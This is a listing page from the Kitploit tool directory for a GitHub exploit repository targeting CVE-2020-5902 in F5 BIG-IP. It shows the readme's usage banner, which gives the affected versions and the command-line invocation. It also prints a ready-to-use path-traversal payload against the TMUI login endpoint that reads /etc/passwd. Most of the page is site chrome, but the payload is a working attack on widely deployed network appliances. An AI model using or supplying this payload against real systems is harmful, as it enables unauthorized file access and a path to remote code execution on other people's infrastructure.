Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-5902 — F5 BIG-IP 任意文件读取+远程命令执行RCE | Kitploit
Tools/GitHubGitHub/zhzyker/cve-2020-5902
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubzhzyker/cve-2020-5902

CVE-2020-5902

F5 BIG-IP 任意文件读取+远程命令执行RCE

View Repository
1386 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Readme

F5 BIG-IP arbitrary file read + remote command execution RCE

root@kitploit:~
+-------------------------------------------------------------+
+ DES: by zhzyker as https://github.com/zhzyker/exphub        +
+      CVE-2020-5902 F5 BIG-IP Read File + RCE                +
+-------------------------------------------------------------+
+ USE: python3 <filename> <url>                               +
+ EXP: python3 cve-2020-5902_file.py https://1.1.1.1:8443     +
+ VER: BIG-IP 15.x: 15.1.0/15.0.0                             +
+      BIG-IP 14.x: 14.1.0 ~ 14.1.2                           +
+      BIG-IP 13.x: 13.1.0 ~ 13.1.3                           +
+      BIG-IP 12.x: 12.1.0 ~ 12.1.5                           +
+      BIG-IP 11.x: 11.6.1 ~ 11.6.5                           +
+-------------------------------------------------------------+

Payload

Read file

root@kitploit:~
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Read File

images images

Download Tool